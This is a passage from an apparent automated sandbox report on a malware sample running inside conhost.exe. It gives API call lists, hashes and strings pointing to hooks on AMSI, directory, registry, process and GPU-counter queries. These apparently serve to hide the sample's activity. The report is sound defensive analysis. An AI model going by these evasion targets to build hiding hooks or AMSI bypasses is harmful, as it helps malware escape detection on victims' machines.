  • Part of subcall function 000001D29E8C20C4: GetModuleHandleA.KERNEL32(?,?,?,000001D29E8C1D7D), ref: 000001D29E8C20DC
  • Part of subcall function 000001D29E8C20C4: GetProcAddress.KERNEL32(?,?,?,000001D29E8C1D7D), ref: 000001D29E8C20ED
  • Part of subcall function 000001D29E8C5F60: GetCurrentThreadId.KERNEL32 ref: 000001D29E8C5F9B
Strings
Memory Dump Source
• Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
• Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
• API String ID: 4175298099-4225371247
• Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
• Instruction ID: 8b7f6b2a4df231c9bde63ee3d6ffd789226de77c7eed645b663af9635eea49ec
• Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
• Instruction Fuzzy Hash: 674160B424396AA0EB0CEBE4E8717D82321BB7934CF805517E539032F59EB8828EC351

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
• Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
• Instruction ID: 2ed38ce0bfe92cfc6d426f4a0aed6e84b6004037ec12347840be1909283ea6d2
• Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
• Instruction Fuzzy Hash: E7515E72202B94C6EB58CFA2E55839EB7B1FB99F99F044125DA6947728DF3CC049C700
APIs
Strings
Memory Dump Source
• Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID: destructor'$ned$restrict(
• API String ID: 190073905-924718728
• Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
• Instruction ID: f657af5a7311de4a118e6514e9e0da52f7b43398537b80d622928719daad3973
• Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
• Instruction Fuzzy Hash: B181E471E1366186FAAC9BE6D8783DD2290B7B57CCF584027E935477B6DB3AC8419300

Control-flow Graph

APIs
• GetLastError.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD267
• FlsGetValue.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD27C
• FlsSetValue.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD29D
• FlsSetValue.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD2CA
• FlsSetValue.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD2DB
• FlsSetValue.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD2EC
• SetLastError.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD307
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD33D
• FlsSetValue.KERNEL32(?,?,00000001,000001D29E8CF0FC,?,?,?,?,000001D29E8CC3CF,?,?,?,?,?,000001D29E8C7EE0), ref: 000001D29E8CD35C
  • Part of subcall function 000001D29E8CDAFC: HeapAlloc.KERNEL32(?,?,00000000,000001D29E8CD432,?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CDB51
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD384
  • Part of subcall function 000001D29E8CDB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001D29E8C643A), ref: 000001D29E8CDB8A
  • Part of subcall function 000001D29E8CDB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001D29E8C643A), ref: 000001D29E8CDB94
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD395
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD3A6
Memory Dump Source
• Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
• Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
• Instruction ID: ab3d3014e2f21f0527fbf4387121fd05dd36f69811c7164c4df139058022b2af
• Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
• Instruction Fuzzy Hash: 51413A3024366446FB5CB7F155753FD63827B667BCF18572AE9360AAF6EA38D4028200

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
• Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU user(*)\Running Time
• API String ID: 1943346504-1805530042
• Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
• Instruction ID: cb2dbe6f83b17fc0d67bd7ee7cd5aa67c5ffb3d51e3a622a1cf9f3977aee0871
• Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
• Instruction Fuzzy Hash: C631D772602B6487FB18DF92A8143DDA3A0FFA8B9DF444126DE7943A75DF38C0968740

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
• Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU user(*)\Utilization Percentage
• API String ID: 1943346504-3507739905
• Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
• Instruction ID: 683f8b830d29f6793bc4e6085011839e2be0b11f996f6a325a1ad19a6bf7271c
• Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
• Instruction Fuzzy Hash: E131F731602B258AFB18DFA2A85479963A0FBA5F99F044127EE7943735DF38C486C300

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
• Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
• Instruction ID: df78c5f59cf1bb2888a392de598625eae80d0b12cfa10b111f4050832870d3b4
• Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
• Instruction Fuzzy Hash: E6E19D72602B609AEB28DFA5D4503DD37A4F766B8CF005557EEBA57BA9CB34C580C700
APIs
Strings
Memory Dump Source
• Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
• Instruction ID: 3c1d1e0ea5e291d5167f9d0baf28b11f036ef0a43fb8c40c078e7ab707b6fd5c
• Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
• Instruction Fuzzy Hash: A3E1CF36A02B609AEB28DFA5D4683DD77A0F775B8CF100516EEB957BA9CB34D481C700

                                                          Control-flow Graph
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction ID: a4c69b54cb6bdf7cec9938ac5b604fb2665deba4bbff5f41d560188b163afdf8
                                                          • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction Fuzzy Hash: A741C571313A2091FB1ADB96A8247E963D1FB66BE8F054127DD3D577A4DF38C4499300

                                                          Control-flow Graph
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction ID: 97138f55e1463c9248ece60b4044fe400d30b7db9d3b85f2e4456424710aa288
                                                          • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction Fuzzy Hash: 84419273215B94C6E764CF61E45439E77B1F789B98F448116DAA907768DF3CC889CB00

                                                          Control-flow Graph

                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,000001D29E8CCC0E,?,?,?,?,?,?,?,?,000001D29E8CD3CD,?,?,00000001), ref: 000001D29E8CD4B7
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CCC0E,?,?,?,?,?,?,?,?,000001D29E8CD3CD,?,?,00000001), ref: 000001D29E8CD4D6
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CCC0E,?,?,?,?,?,?,?,?,000001D29E8CD3CD,?,?,00000001), ref: 000001D29E8CD4FE
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CCC0E,?,?,?,?,?,?,?,?,000001D29E8CD3CD,?,?,00000001), ref: 000001D29E8CD50F
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CCC0E,?,?,?,?,?,?,?,?,000001D29E8CD3CD,?,?,00000001), ref: 000001D29E8CD520
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction ID: 24a6bf533a8fe68b584a175c90bbdd8739000e8860d1df61a008008e47886064
                                                          • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction Fuzzy Hash: 52118E3034726081FB5CB7E5A5713F963817BA63FCF48572AE939066FADE38D5028200

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\dialerchildproc
                                                          • API String ID: 166002920-1933775637
                                                          • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction ID: db28b0a6fccb13f95e9ab0e56f4354309450baf28b7b75bae2659d2b87a95409
                                                          • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction Fuzzy Hash: E2117C72615B64C2E7148B61F41439E6760FB99BA8F504316EA7A02BB8CF7CC589CB00

                                                          Control-flow Graph
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: 7dbce0ee019654ad271702b6b52ccf1bbfd2d96d306b60ed36a4bc96b1b59494
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: FC81BF7160366586F75CAFF594713D92390BBB7B8CF044027EA78437B6DA3AC9868700
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000001D29E8CA3B3,?,?,?,000001D29E8C9B9C,?,?,?,?,000001D29E8C96BD), ref: 000001D29E8CA279
                                                          • GetLastError.KERNEL32(?,?,?,000001D29E8CA3B3,?,?,?,000001D29E8C9B9C,?,?,?,?,000001D29E8C96BD), ref: 000001D29E8CA287
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000001D29E8CA3B3,?,?,?,000001D29E8C9B9C,?,?,?,?,000001D29E8C96BD), ref: 000001D29E8CA2B1
                                                          • FreeLibrary.KERNEL32(?,?,?,000001D29E8CA3B3,?,?,?,000001D29E8C9B9C,?,?,?,?,000001D29E8C96BD), ref: 000001D29E8CA2F7
                                                          • GetProcAddress.KERNEL32(?,?,?,000001D29E8CA3B3,?,?,?,000001D29E8C9B9C,?,?,?,?,000001D29E8C96BD), ref: 000001D29E8CA303
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction ID: 58c48f13cdf15a63397576e6a12ab1cc5009d60fdba247cbb9cebc0aced32b58
                                                          • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction Fuzzy Hash: FB31B631313A70E5EF1A9BD6A8207D92394BB69BA8F590626DD3F073B1DF39C5858300
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction ID: 6902942405629e849f29cfbac9ca15efd2b4a7f93a50d25bca3d0cac9ab0ac44
                                                          • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction Fuzzy Hash: 3B118271311B6486E7549B92F86435D66A4FFA8FE8F44421AEA7E877B4CF38C8848740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction ID: 0546fa13572bbf481bf845f95c433a7d11921431f24a255cbba33c2ee440a035
                                                          • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction Fuzzy Hash: D9118E36302754C2EB589B65E4242AD6361FF59B98F08042ADEBD03765EF3DC9858704
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                          • Instruction ID: 82bc11c909149179d69fe6b225af1e9ddc9cf23d6c5aa8493685a2f5972d99c7
                                                          • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                          • Instruction Fuzzy Hash: F3D1C97620AB9886DB749B56E4A039A77A0F3D9B88F100117EAED57BB5CF3CC541DB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
